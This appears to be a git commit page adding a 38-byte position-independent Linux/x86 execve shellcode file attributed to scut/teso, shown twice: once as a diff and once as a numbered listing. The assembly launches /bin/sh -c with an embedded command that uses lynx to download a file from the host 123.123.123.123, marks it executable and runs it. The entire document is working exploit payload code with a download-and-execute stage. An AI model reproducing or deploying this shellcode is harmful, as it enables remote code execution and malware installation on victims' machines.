initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /other/tsig/shellcode/execve-shellcode.s
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
1 files changed, 49 insertions, 0 deletions
diff --git a/other/tsig/shellcode/execve-shellcode.s b/other/tsig/shellcode/execve-shellcode.s
new file mode 100644
index 0000000..25015cf
--- /dev/null
+++ b/other/tsig/shellcode/execve-shellcode.s
@@ -0,0 +1,49 @@
+/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */
+.data
+.globl  cbegin
+.globl  cend
+cbegin:
+        jmp     jahead
+docall:
+        pop     %edi
+        xorl    %eax, %eax              /* read number of arguments */
+        push    %eax
+        movb    (%edi), %al
+        inc     %edi
+decl1:  push    %edi
+decl2:  scasb                           /* search delim bytes */
+        jnz     decl2
+        movb    %ah, -1(%edi)
+        dec     %eax
+        jnz     decl1
+        pop     %ebx                    /* pathname */
+        push    %ebx
+        push    %eax
+        pop     %edx                    /* esp -= 4, edx = &envp[] = NULL */
+        movl    %esp, %ecx              /* ecx = &argv[] */
+        movb    $11, %al
+        int     $0x80
+jahead: call    docall
+/* reverse order arguments */
+.byte   0x03    /* number of arguments */
+.ascii  "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a"
+.byte   0x03
+.ascii  "-c"
+.byte   0x02
+.ascii  "/bin/sh"
+.byte   0x01
+cend:
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /other/tsig/shellcode/execve-shellcode.s
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/other/tsig/shellcode/execve-shellcode.s b/other/tsig/shellcode/execve-shellcode.s new file mode 100644 index 0000000..25015cf --- /dev/null +++ b/other/tsig/shellcode/execve-shellcode.s
@@ -0,0 +1,49 @@
	1	/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */
	2
	3	.data
	4	.globl cbegin
	5	.globl cend
	6
	7	cbegin:
	8
	9	jmp jahead
	10
	11	docall:
	12	pop %edi
	13
	14	xorl %eax, %eax /* read number of arguments */
	15	push %eax
	16	movb (%edi), %al
	17	inc %edi
	18
	19	decl1: push %edi
	20	decl2: scasb /* search delim bytes */
	21	jnz decl2
	22
	23	movb %ah, -1(%edi)
	24	dec %eax
	25	jnz decl1
	26
	27	pop %ebx /* pathname */
	28	push %ebx
	29
	30	push %eax
	31	pop %edx /* esp -= 4, edx = &envp[] = NULL */
	32	movl %esp, %ecx /* ecx = &argv[] */
	33
	34	movb $11, %al
	35	int $0x80
	36
	37	jahead: call docall
	38
	39	/* reverse order arguments */
	40	.byte 0x03 /* number of arguments */
	41	.ascii "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a"
	42	.byte 0x03
	43	.ascii "-c"
	44	.byte 0x02
	45	.ascii "/bin/sh"
	46	.byte 0x01
	47
	48	cend:
	49